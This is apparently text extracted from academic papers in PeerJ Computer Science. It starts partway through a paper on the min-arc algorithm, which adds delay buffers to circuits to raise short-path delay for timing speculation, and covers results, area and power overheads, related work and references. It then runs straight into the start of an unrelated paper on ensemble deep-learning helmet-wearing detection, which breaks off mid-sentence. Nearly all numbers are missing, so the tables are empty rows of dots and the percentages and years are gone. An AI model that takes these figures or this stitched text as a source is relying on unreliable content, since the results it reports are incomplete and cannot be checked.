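            extra = added_delay(emax[(i, j)], emin[(i, j)], tpd, thd)
            if extra > 0:
                g[i][j]["weight"] += extra
    return g  # step f repeats above; step g rebuilds the netlist from g
```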
we evaluate the algorithm on iscas’ benchmark suite (hansen, yalcin & hayes, ). the suite provides a diverse class of circuits in terms of number of ios, logic gates and interconnections (nets). table lists a brief description and other relevant details of the circuits. all the circuits were transformed into network graphs as described in ‘min-arc algorithm for increasing short path delays’. the interconnect delays and logic cell delays were obtained by synthesizing the circuits for nm technology using osu standard cell library (stine et al., ). all circuits are synthesized for minimum area (max area is set to zero) using synopsys design compiler, which acts as a starting point for our algorithm. all the configurations (l〈l〉−t〈t〉) described in ‘performance & contamination delay: a study on alpha processor’ were investigated. results analysis positive results were noted in this study. first, for all the circuits, the min-arc method was able to increase the short path delays to the desired threshold levels without any leeway on pd. we continued our evaluation with all the configurations to include leeway in order to study the effect of increasing pd. we include the results only for a few selected circuits and average of all circuits. it was found that circuit characteristics (i.e., size and connectivity) have strong effects on how the algorithm performs. figure illustrates the increase in the short path delays and critical path delays for different configuration in c and c avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure charts showing increase in contamination (short path) delay and propagation (critical path) delay of circuits. circuits. the chart also shows the average increase of short and critical path delays for all nine circuits. for smaller circuits (as in c ), we notice that there is not much the algorithm possibly could do, as there is a higher chance of affecting the critical path by adding delay to any net. in c , we notice that the maximum delay increase of short paths from the base circuit with ps, (with % leeway) is around ps. however, in larger circuits (as in c ), delay buffers were more easily added. this is seen in c , where short path delay is increased from ps to ps, again with % leeway. in other words, as the circuit size increases, the number of independent short paths also become higher in number, allowing easy inclusion of delay buffers. it should also be noted that there is not much impact on increasing leeway from l to l or even higher levels pd. on the other hand, increasing leeway tend to have a great impact in increasing the cd. on an average, there is a . × factor of increase in short path delay for each % increase in leeway. assuming lwy = , we were able to achieve %– % increase in cd, and increasing lwy steadily from to %, we observed increase of cd in a saw tooth pattern achieving %– , % increase in cd. it should be observed from the critical path delay patterns that the algorithm strictly adheres to the limit imposed on critical path delay. one major side effect of adding buffers to circuits is that it affects path delay distribution. although our goal is to increase the cd to a threshold limit, pushing a set of paths to one side may increase the timing error rate during execution. therefore, it is important to analyze the delay distribution of the circuit paths. 
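one rough way to inspect the path delay distribution is sketched below. it is our own illustration, feasible only for small circuits because it enumerates every s-to-d path explicitly; the choice of ten equal bins between tcd and tpd mirrors the analysis that follows.

```python
# illustrative only: enumerate s->d paths and bin their delays into ten bins
# between the contamination delay (tcd) and the propagation delay (tpd).
import networkx as nx
import numpy as np

def path_delay_histogram(g, tcd, tpd, bins=10):
    delays = []
    for path in nx.all_simple_paths(g, "s", "d"):
        delays.append(sum(g[u][v]["weight"] for u, v in zip(path, path[1:])))
    counts, edges = np.histogram(delays, bins=bins, range=(tcd, tpd))
    return counts, edges
```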
even though the structure of the circuit is maintained, as the short paths are now pushed to offer higher delay, it increases the possibility of error occurrences in ts framework. for our case study in ‘performance & contamination delay: a study on alpha processor,’ we modelled this increase in timing error rates as dev. avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure path delay distribution from cd to pd for c and c . figure illustrates the path delay distributions for selected configurations of two circuits (c and c ). we have divided the range between cd and pd into ten bins. x-axis in fig. represent the bin number. for c , t l and t l configuration reduce the number of paths having higher delay. this implies a reduction in timing error rate in ts framework. higher leeway configuration t l increases cd but path delay distribution matches the base line, implying no increase in timing error rate. for c , even no leeway configuraion (t l ) performs better than baseline. also, higher leeway configurations, t l and t l , perform much better than baseline in terms of paths having higher delay. overall, for c (and other smaller circuits), the path structure is mostly maintained and in the case of c (and otherlarger circuits), the circuit structure was altered moderately. increase in number of paths having higher delay implies increase in timing error rate of ts framework. from these results, we conclude that for smaller circuits, our algorithm maintains or does not increase timing error rate of ts framework. for larger circuits, our algorithm reduces the timing error rate for higher leeway configurations. as timing error rate also influence the possible performance gain, reduction in timing error rate is favorable for ts framework. to illustrate this point further, we present mean and standard deviation of all the circuits. figure presents plots of selected circuits and average of all the circuits. we note that the smaller circuits (c ) suffer from negligible deviation from original circuit in spite of higher mean, and the larger circuits ((c )) are vulnerable to change in structure. from the average plot, it is also evident that higher leeway values cause more deviation. a maximum deviation of − % and + % were observed for t l and t l configurations, respectively. area overhead a major overhead for min-arc algorithm is the area penalty. more the circuit allows adding buffers, more the overhead in chip real estate. we estimate the original circuit area in terms of buffer delays, and compare the area increase for each of the configurations. this study facilitates to narrow down the choices of l and t for any given circuit. table enlists the percentage area increase for various l and t combinations, for all the circuits. it is important to choose the configuration that has highest increase in delay with moderate increase in area. avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure average path delay distribution, in terms of mean and deviation. mean values are represented by line while standard deviation values are represented by bars. without any leeway (corresponding to l ), with every % increase in t there is around % increase in area. this holds for most circuits, except for smaller circuits as in c and c , where it is around %. a maximum of % increase is observed for c at t = %. 
for this maximum threshold, there is a wide range of area increase across the benchmark circuits. we did not observe any strong relation between circuit size and the area increase. this means that it is the circuit connectivity that has a major role to play on buffer placements. for t = %, the minimum area increase of around % is observed for the circuit c . a general observation from our study is that the area increases with l or t . however, we did observe quite a few configurations, where the area decreases with l or t . this reflects how the algorithm handles different input combinations independently, rather than building from previous level output. we noticed several places where area would decrease with l (shaded dark black in table ). observation related to these shaded entries is that they beat the increasing area trend with increasing leeway. as illustrated, there is at least one place where this occurs in each circuit, with the exception of c and . in the case of t , we notice that there are only a couple of configurations where this occurs, namely in c (underlined in table ). this explains how target threshold for short paths affect increase in area. in most cases, we noticed around % increase in area for every % in l. in majority of the cases, we noted only moderate increase in area (< %). we observed cases where the area increase was more than %, in which of them are from the same circuit, c . this is a -bit alu with controller (c ) that has a lot of parallel paths with few common edges. similar but less intense effect is seen in the case of the -bit alu (c ). the configurations where the area increase exceeds % is highlighted light black in the table. power overhead the addition of buffers to the circuit for increasing contamination delay also increases the power consumption. table presents the percentage power increase for various l and t combinations. using the spice models, we have estimated the power consumed by the buffers added and estimated the percentage increase in worst case power consumption. we have used golden configuration (l t ) as the base for all configurations of l and t . avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table percentage area increase after addition of buffers relative to base configuration t l . ckt l l l l l l l c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . (continued on next page) avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) ckt l l l l l l l c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . we notice from the table that increase in power consumption is also dependent on the circuit topology rather than the size of the circuit. without any leeway (corresponding to l ), with every % increase in t there is only around % increase in power. 
this holds for most circuits, except for smaller circuit c . we also notice that for a given t , increasing l has very minimal effect ( %– %) on the power increase. therefore, while applying our algorithm, an optimal value of t can be chosen as any value of l can be chosen without altering the power budget. when timing speculation is used for overclocking, voltage is kept constant. therefore, increase in power is independent of voltage and is dependent only on frequency change and the additional power overhead caused by the buffers. in this paper, as we primarily analyze our algorithm at circuit-level, we only present power results at circuit-level. changes in system-level power estimates can be easily derived with the power analysis present in this section. when compared to area overheads of our algorithm, power results presented in table are quite interesting. for example, for circuit c where we have seen % area increase, power increase is only about %. the power increase is relatively small when compared to the area increase. it is due to the fact the delay buffers draw much less current than the other standard cells. even though we are limited with the type of delay buffer configurations available in our cell library, much more complex buffers can be constructed at gate-level which can consume less power without degrading delay characteristics. related literature early works on timing verification involved identification and categorization of long paths as either false paths or sensitizing paths (du, yen & ghanta, ). long paths that are false paths (paths with no activity) unnecessarily increase the circuit critical delay. therefore, detecting false paths and mitigating them is a critical issue in digital circuits even to this day (cheng et al., ; tsai & huang, ; coudert, ). as already mentioned in ‘introduction,’ not many works are done keeping short paths in mind. sylon-dream accomplishes faster multi-level networks by its level reduction technique (sdlr) (chen & muroga, ). the non-critical paths are processed by an area reduction procedure to reduce network area without increasing the maximum depth. sdlr uses the concept of permissible functions in both level and area reduction procedures. gate resizing and buffer insertion are two major techniques for critical path optimization. critical path selection instead of sensitization is suggested for performance optimization (chen, du & liu, ). here the objective is to select a small set of paths to ease the optimization process by guaranteeing the delay of the circuit to be no longer than a given threshold. avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table percentage power increase after addition of buffers relative to base configuration t l . ckt l l l l l l l c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . (continued on next page) avirneni et al. ( ), peerj comput. 
sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) ckt l l l l l l l c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . several optimization techniques, involving clustering, logic analysis and gate resizing are proposed in touati, savoj & brayton ( ), rohfleisch, wurth & antreich ( ), entrena et al. ( ), fang & jone ( ) and lu et al. ( ). a statistical timing analysis approach is investigated in jyu & malik ( ). a re-timing and re-synthesis approach is presented in pan ( ). this work suggests re-synthesizing the circuit to expose signal dependencies. the optimization scheme tightly constrains logic re-synthesis, so that the re-synthesized circuit is guaranteed to meet the performance target. recent work in kim, joo & kim ( ) focus on buffer insertion to solve variation in clock skew. the authors in lin, lin & ho ( ) explore adjustable delay buffer insertion for minimizing clock skew in multi voltage designs. buffer insertion in the presence of process variation is explored in xiong & he ( ) with the focus on improving yield. the authors in dynatune propose an algorithm based on min-cut approach to shorten the long path delay (wan & chen, ). it is based on simulation profiling and uses multiple threshold voltage cells to reduce the delay of long paths. even though our min-cut algorithm is similar to the dynatune algorithm, it is applied to a drastically different aspect of timing speculation framework i.e., increasing contamination delay. unlike dynatune, our approach doesn’t use simulation profiling to drive the circuit optimization as hold time delay should be satisfied all the time. therefore, our algorithm considers more tighter constraints than the dynatune algorithm. although there are several delay optimization approaches proposed in literature, all of them try to hold the critical path delay within a threshold. it is fundamental that all the timing optimization algorithms must consider short path timing constraints. data latches in a pipelined architecture inherently possess set up and hold time constraints. it is necessary to make sure that the resulting circuit has no set-up or hold time violations, to guarantee correct data transfers. there are algorithms to make sure the circuit is free of any such violations considering both long and short paths (fung, betz & chow, ). however, there is no consideration for short path constraints from the perspective of aggressive clocking we are dealing with. the authors in ye et al. ( ) propose a steepest descent method (sdm) to determine the potential benefits of timing speculation. from the experiments conducted, it is found that circuit topology plays a big role in realizing the benefits of timing speculation. our algorithm can be used for circuits that shows promising results using sdm approach analyzed with design parameters like process technology, desired frequency and voltage corners, error penalty of the implementation etc. in this paper, we try to alleviate the contamination delay limitation imposed on aggressive timing speculation architectures. due to this, we fundamentally differ from all of the existing works. this is the first work avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. aimed at increasing the contamination delay of digital circuits up to a given threshold. 
it is also important to point out that our algorithm works complementary to existing synthesis schemes and can also be integrated with physically aware timing optimizations that are used for achieving timing closure. conclusions contamination delay is one of the major bottlenecks for achieving higher performance in timing speculation architectures. in this paper, we investigated the theoretical margins for improving performance for the dual latch framework. we brought forward the limits to performance enhancements in timing speculation. using our analysis, we demonstrated how much performance improvement is achievable by increasing the contamination delay of the circuit without affecting the critical path delays. performance gains were attained even for the cases affecting propagation delay by up to %. we studied further how these gains vary with target timing error rate. the main goal of this paper is to increase the short path delays to a specified threshold, without (or minimally) affecting the critical path delays. we proposed the min-arc algorithm to achieve this goal. we studied iscas- circuits, where we have shown that the min-arc is able to increase the contamination delay of all the circuits without affecting propagation delay. we analyzed further as to how much these short paths increase while allowing a small leeway to critical path delay. we observed moderate area and power increase in the circuits implementing the min-arc algorithm. finally, we discuss how the algorithm preserves the path delay distributions of the circuits and therefore, closely maintaining the rate of timing error occurrences from the original circuit. as a future improvement, gate/cell sizing approach can be used instead of adding delay buffers for improved area, power results. to conclude, min-arc algorithm successfully increases the contamination delay of logic circuits with moderate area and power overheads. the results we have obtained are very promising, opening up different directions for the near future. additional information and declarations funding the research reported in this paper is funded in part by the information infrastructure institute and the jerry r. junkins endowment at iowa state university. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: information infrastructure institute. jerry r. junkins endowment. competing interests arun k. somani is an academic editor for peerj computer science. avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • naga durga prasad avirneni, prem kumar ramesh and arun k. somani conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the raw data was supplied as a supplemental dataset. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references austin tm. . diva: a reliable substrate for deep submicron microarchitecture de- sign. in: microarchitecture, . micro- . proceedings. nd annual international symposium on. piscataway: ieee, – . 
avirneni n, ramesh p, somani a. . utilization aware power management in reliable and aggressive chip multi processors. ieee transactions on computers ( ): – . avirneni ndp, somani ak. . low overhead soft error mitigation techniques for high-performance and aggressive designs. ieee transactions on computers ( ): – doi . /tc. . . avirneni ndp, somani ak. . countering power analysis attacks using reliable and aggressive designs. ieee transactions on computers ( ): – . bezdek m. . utilizing timing error detection and recovery to dynamically improve superscalar processor performance. master’s thesis, iowa state university. burger d, austin tm. . the simplescalar tool set, version . . acm sigarch computer architecture news ( ): – . chen h-c, du dh-c, liu l-r. . critical path selection for performance optimiza- tion. ieee transactions on computer-aided design of integrated circuits and systems ( ): – doi . / . . chen k-c, muroga s. . timing optimization for multi-level combinational networks. in: proceedings of the th acm/ieee design automation conference. new york: acm, – . cheng l, chen d, wong mdf, hutton m, govig j. . timing constraint-driven technology mapping for fpgas considering false paths and multi-clock domains. in: proceedings of the ieee/acm international conference on computer-aided design. piscataway: ieee press, – . coudert o. . an efficient algorithm to verify generalized false paths. in: design automation conference (dac), th acm/ieee. piscataway: ieee, – . avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /tc. . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. das s, roberts d, lee s, pant s, blaauw d, austin t, flautner k, mudge t. . a self- tuning dvs processor using delay-error detection and correction. ieee journal of solid-state circuits ( ): – doi . /jssc. . . du dh, yen sh, ghanta s. . on the general false path problem in timing analysis. in: proceedings of the th acm/ieee design automation conference. new york: acm, – . edmonds j, karp rm. . theoretical improvements in algorithmic efficiency for network flow problems. journal of the acm ( ): – doi . / . . entrena l, olías e, uceda j, espejo j. . timing optimization by an improved redundancy addition and removal technique. in: proceedings of the conference on european design automation. piscataway: ieee computer society press, – . ernst d, kim ns, das s, pant s, rao r, pham t, ziesler c, blaauw d, austin t, flautner k, mudge t. . razor: a low-power pipeline based on circuit-level timing speculation. in: micro- , th annual ieee/acm international symposium on microarchitecture, piscataway: ieee, – . fang c-l, jone w-b. . timing optimization by gate resizing and critical path identification. ieee transactions on computer-aided design of integrated circuits and systems ( ): – doi . / . . fung r, betz v, chow w. . simultaneous short-path and long-path timing opti- mization for fpgas. in: proceedings of the ieee/acm international conference on computer-aided design. piscataway: ieee computer society, – . greskamp b, torrellas j. . paceline: improving single-thread performance in nanoscale cmps through core overclocking. in: pact’ proceedings of the th in- ternational conference on parallel architecture and compilation techniques. piscataway: ieee, – . 
greskamp b, wan l, karpuzcu ur, cook jj, torrellas j, chen d, zilles c. . blueshift: designing processors for timing speculation from the ground up. in: ieee th international symposium on high performance computer architecture, . hpca . piscataway: ieee, – . gupta ms, rivers ja, bose p, wei g-y, brooks d. . tribeca: design for pvt variations with local recovery and fine-grained adaptation. in: proceedings of the nd annual ieee/acm international symposium on microarchitecture. new york: acm, – . hansen mc, yalcin h, hayes jp. . unveiling the iscas- benchmarks: a case study in reverse engineering. ieee design & test of computers ( ): – doi . / . . jyu h-f, malik s. . statistical timing optimization of combinational logic circuits. in: computer design: vlsi in computers and processors, . iccd’ . proceedings., ieee international conference on. piscataway: ieee, – . kim j, joo d, kim t. . an optimal algorithm of adjustable delay buffer insertion for solving clock skew variation problem. in: proceedings of the th annual design automation conference. new york: acm, . avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jssc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. lin k-y, lin h-t, ho t-y. . an efficient algorithm of adjustable delay buffer insertion for clock skew minimization in multiple dynamic supply voltage designs. in: proceedings of the th asia and south pacific design automation conference. piscataway: ieee press, – . lu a, eisenmann h, stenz g, johannes fm. . combining technology mapping with post-placement resynthesis for performance optimization. in: computer design: vlsi in computers and processors, . iccd’ . proceedings. international conference on. piscataway: ieee, – . pan p. . performance-driven integration of retiming and resynthesis. in: proceedings of the th annual acm/ieee design automation conference. new york: acm, – . ramesh pk, subramanian v, somani ak. . system level analysis for achieving thermal balance and lifetime reliability in reliably overclocked systems. international journal on advances in systems and measurements ( ): – . rohfleisch b, wurth b, antreich k. . logic clause analysis for delay optimization. in: design automation, . dac’ . nd conference on. piscataway: ieee, – . shenoy nv, brayton rk, sangiovanni-vincentelli al. . minimum padding to satisfy short path constraints. in: computer-aided design, . iccad- . digest of technical papers., ieee/acm international conference on. piscataway: ieee, – . stine je, castellanos i, wood m, henson j, love f, davis wr, franzon pd, bucher m, basavarajaiah s, oh j, jenkal r. . freepdk: an open-source variation-aware design kit. in: proceedings of the ieee international conference on microelectronic systems education. piscataway: ieee computer society, – . subramanian v, bezdek m, avirneni nd, somani a. . superscalar processor performance enhancement through reliable dynamic clock frequency tuning. in: dependable systems and networks, . dsn’ . th annual ieee/ifip international conference on. piscataway: ieee, – . touati hj, savoj h, brayton rk. . delay optimization of combinational logic cir- cuits by clustering and partial collapsing. in: computer-aided design, . iccad- . digest of technical papers., ieee international conference on. piscataway: ieee, – . tsai s, huang c-y. . a false-path aware formal static timing analyzer considering simultaneous input transitions. in: design automation conference, . dac’ . 
th acm/ieee. piscataway: ieee, – . wan l, chen d. . dynatune: circuit-level optimization for timing speculation considering dynamic path behavior. piscataway: ieee, – . xiong j, he l. . fast buffer insertion considering process variations. in: proceedings of the international symposium on physical design. new york: acm, – . ye r, yuan f, zhang j, xu q. . on the premises and prospects of timing speculation. in: proceedings of the design, automation & test in europe conference & exhibition. san jose: eda consortium, – . avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. submitted august accepted october published december corresponding author chengbin peng, pengcheng- bin@nbu.edu.cn academic editor faizal khan additional information and declarations can be found on page doi . /peerj-cs. copyright fan et al. distributed under creative commons cc-by . open access a deep learning-based ensemble method for helmet-wearing detection zheming fan , chengbin peng , , licun dai , feng cao , jianyu qi and wenyi hua college of information science and engineering, ningbo university, ningbo, china ningbo institute of industrial technology, chinese academy of sciences, ningbo, china abstract recently, object detection methods have developed rapidly and have been widely used in many areas. in many scenarios, helmet wearing detection is very useful, because people are required to wear helmets to protect their safety when they work in construction sites or cycle in the streets. however, for the problem of helmet wearing detection in complex scenes such as construction sites and workshops, the detection accuracy of current approaches still needs to be improved. in this work, we analyze the mechanism and performance of several detection algorithms and identify two feasible base algorithms that have complementary advantages. we use one base algorithm to detect relatively large heads and helmets. also, we use the other base algorithm to detect relatively small heads, and we add another convolutional neural network to detect whether there is a helmet above each head. then, we integrate these two base algorithms with an ensemble method. in this method, we first propose an approach to merge information of heads and helmets from the base algorithms, and then propose a linear function to estimate the confidence score of the identified heads and helmets. experiments on a benchmark data set show that, our approach increases the precision and recall for base algorithms, and the mean average precision of our approach is . , which is better than many other approaches. with gpu acceleration, our approach can achieve real-time processing on contemporary computers, which is useful in practice. subjects computer vision, data mining and machine learning, social computing keywords ensemble method, deep learning, helmet-wearing detection, face detection introduction helmets can play a vital role in protecting people. for example, many severe accidents in production and work sites and roads have been related to violations of wearing helmets. some personnel may lack safety awareness in a working site and often do not or forget to wear helmets. on the road, craniocerebral injury is the leading cause of serious injury to cyclists in road traffic (world health organization, ). 
however, wearing a helmet reduces the risk of head injury of motorcycle riders by % (liu et al., ), and wearing a helmet reduces the risk of head injury for cyclists by %– % (thompson, rivara & thompson, ). monitoring helmet-wearing manually can have many limitations, as people can be fatigue and costly. reducing manual monitoring while ensuring that relevant personnel wearing helmets all the time in the working area has become an urgent problem. how to cite this article fan z, peng c, dai l, cao f, qi j, hua w. . a deep learning-based ensemble method for helmet-wearing de- tection. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:pengchengbin@nbu.edu.cn mailto:pengchengbin@nbu.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. image recognition technology can reduce the workforce and material expenditures, and can significantly protect workers in many areas. developments of computer vision algorithms and hardware (feng et al., ) have paved the road for the application in helmet detection. deep neural networks have gained much attention in image classification (krizhevsky, sutskever & hinton, ), object recognition (donahue et al., ), and image segmentation (garcia-garcia et al., ). previous computer vision algorithms for helmet detection are usually used in relatively simple scenes. for helmet detection, rubaiyat et al, ( ) used a histogram of oriented gradient and a support vector machine to locate persons, then used a hough transform to detect helmet for the construction worker. li et al. ( b) identified helmets by background subtraction. li et al. ( a) used vibe background modeling algorithm and human body classification framework c to select people and heads, and then identified whether people wore helmets through color space transformation and color feature recognition. however, such approaches are typically not suitable for complex scenes and dynamic backgrounds, such as construction sites, workshops, and streets. choudhury, aggarwal & tomar ( ) and long, cui & zheng ( ) use single shot object detector algorithm to detect helmets. siebert & lin ( ) used retinanet which uses a multi-scale feature pyramid and focal loss to address the general limitation of one-stage detectors in accuracy, it works well in certain situations but its performance is highly scene dependent and influenced by light. bo et al. ( ) use the you only look once (yolo) algorithm to accurately detect helmet wear in images with an average of four targets. however, most of these approaches are not suitable for both small and large helmets at the same time. in this work, we propose a framework to integrate two complementary deep learning algorithms to improve the ability of helmet-wearing detection in complex scenes. our approach is able to identify regular-size and tiny-size objects at the same time for helmet- wearing detection, and can be used for detection in complex scenes. this framework can outperform traditional approaches on benchmark data. related work the starting point of cnn is the neurocognitive machine model (fukushima & miyake, ). at this time, the convolution structure has appeared. the classic lenet (lecun et al., ) was proposed in . however, cnn’s edge began to be overshadowed by models such as svm (support vector machine) later. 
with the introduction of relu (rectified linear units), dropout, and historic opportunities brought by gpu and big data, cnn ushered in a breakthrough in : alexnet (krizhevsky, sutskever & hinton, ). in the following years, cnn showed explosive development, and various cnn models emerged. cnn has gradually gained the favor of scholars due to its advantages of not having to manually design features when extracting image features (shi, chen & yang, ). fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. many recent object detection approaches are based on rcnn (region-based convolutional neural networks) algorithms and yolo algorithms (redmon et al., ). rcnn is an improved algorithm based on cnn. girshick et al. propose an epoch-making rcnn algorithm (girshick et al., ) in the field of object detection. the central idea is to use a search selective method to extract some borders from the image. then the size of the area divided by the border is normalized to the convolutional neural network input size, and then the svm is used to identify the target. the bounding box of the target is obtained through a linear regression model. it brought deep learning and cnn to people’s sight. however, there are disadvantages such as cumbersome training steps, slow test training speed, and large space occupation. in order to improve the training and testing speed of rcnn, fast rcnn algorithm (girshick, ) was developed. it uses fewer layers while adding an roi pooling layer to adjust the convolution area, and using softmax instead of the original svm for classification. compared with rcnn, fast rcnn has improved training and testing speed. however, because the selective search method is also used to extract the borders of the region of interest, the speed of this algorithm is still not ideal for working with large data sets. later, faster rcnn (ren et al., ) integrates feature extraction, proposal extraction, bounding box regression, classification, etc. into a network. the overall performance is far superior to cnn, and at the same time, it runs nearly much faster than cnn. thus, faster rcnn is commonly used in many applications. the faster rcnn performs well for relatively large objects, but when detecting small faces or helmets, there will be a large false negative rate. tiny face has made certain optimizations for small face detection. it mainly optimizes face detection from three aspects: the role of scale invariance, image resolution, and contextual reasoning. scale invariance is a fundamental property of almost all current recognition and object detection systems, but from a practical point of view, the same scale is not applicable to a sensor with a limited resolution: the difference in incentives between a px face and a px face is undeniable (hu & ramanan, ). ramanan et al. conducted an in-depth analysis of the role of scale invariance, image resolution, and contextual reasoning. compared with mainstream technology at the time, the error rate can be significantly reduced (hu & ramanan, ). boosting algorithm was initially proposed as a polynomial-time algorithm, and the effectiveness has been experimentally and theoretically proved (schapire, ). afterward, freund et al. improved the boosting algorithm to obtain the adaboost algorithm (freund & schapire, ). the principle of the algorithm is to filter out the weights from the trained weak classifiers by adjusting the sample weights and weak classifier weights. 
the weak classifiers with the smallest coefficients are combined into a final robust classifier. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in this work, in order to identify a variety of heads and helmets in complex scenes, we propose a framework to use incorporate multiple complementary deep learning algorithms to improve the joint performance. materials & methods method to address the helmet-wearing detection problem, we compare several object detection methods, such as the naive bayes classifier, svm, and artificial neural networks classifier. naive bayes usually needs independent distributive premises. svm is difficult to training for various scenes. in the case of a complex scene and huge training data, artificial neural networks are expected to have better accuracy and reliability, so we propose to use artificial neural networks, especially, convolutional neural networks, to solve this issue. to address the disadvantages raised by long-range cameras, we further improve the performance by integrating multiple complementary deep neural network models. base algorithms faster rcnn for detecting faces and helmet-wearing. after images are fed, faster rcnn firstly extracts image feature maps through a group of basic conv+relu+pooling layer. next, rpn (region proposal networks) will set a large number of anchors on the scale of the original image, and randomly select positive anchors and negative anchors from all anchors for binary training, and use these anchors and a softmax function to initially extract positive anchors as the candidate area. at this time, the candidate regions are not accurate and require bounding boxes. for a given image i, we use a to represent the ground-truth anchors. we use af and cf to represent the identified bounding boxes and helmet-wearing confidence scores, respectively, computed by the faster-rcnn algorithm. if we use f to represent the algorithm, wf to represent the weight of the network, this approach can be written as follows. af,cf =f(i,wf) ( ) if we consider af =f(i,wf)[ ] and cf =f(i,wf)[ ], we can use loss(f(i,wf)[ ],f(i,wf)[ ],a) ( ) to represent the loss function (fukushima & miyake, ) when to minimize differences between the detected anchors and the ground-truth. thus, when we train this model, the optimization is as follows. w∗f =argminwfloss(f(i,wf)[ ],f(i,wf)[ ],a) ( ) tiny face for detecting faces. the overall idea of tiny face is similar to rpn in faster rcnn, which is a one-stage detection method. the difference is that some scale specific design and multi-scale feature fusion are added, supplemented by image pyramid so that fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the final detection effect for small faces is better. the training data were changed by three scales, with one-third of the probability respectively and sent to the network for training. multiple scales could be selected to improve the accuracy rate in the prediction. for a given image i, we can also use at and ct to represent the identified bounding boxes and confidence scores computed by the tiny face algorithm, so if we use t to represent the tiny face algorithm and wt to represent the corresponding weight, we can have at,ct =t(i,wt ) ( ) however, tiny face can only be used to determine whether the detection target contains a human face and cannot directly distinguish whether the target is wearing a helmet. 
thus, we propose to use cnn to overcome this disadvantage. cnn for detecting helmet-wearing. for anchors determined by tiny face, we can use a cnn to detect helmets above the face. we enlarge the face area detected by the tiny face and feed it into the cnn model for prediction. the confidence scores indicating whether there is a helmet above the face can be computed by the cnn algorithm cc =c(at,i,wc), ( ) where c is a function representing the forward propagation of cnn. here, c is a composition of two convolution layers and one fully connected layer. the loss function is again to minimize the difference between detected helmets and the ground-truth loss(at,c(at,i,wc),a). ( ) ensemble model detecting high and low resolution helmets for the two lists of face anchors af and at detected by the base algorithms above, we merge them with the following strategy. we first initialize an empty anchor list as and two score vector csf and csc. for the ith anchor in af and the corresponding score in cf, namely, af[i] and cf[i], we first insert them into as and csf respectively. then af[i] is compared with all the anchors in at . if some anchors in at have more than % overlapping area with af[i], we remove these anchors in at and remove the corresponding entries in cc. we also take the mean value of the removed entries in cc and insert it into csc. if no overlapped anchors in at is found, we insert zero into csc. after all the anchors in af in processed, the remaining anchors in at , the remaining confidence values in cc, and a zero vector of the same length is inserted into as, csc, and csf, respectively. at last, we compute the covering area of each anchor in as and store them in δ. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the pseudocode of the merge process can be described as follows. after the data preparation, many ensemble learning methods can be used for model integration. in this work, we consider a basic ensemble model defined as 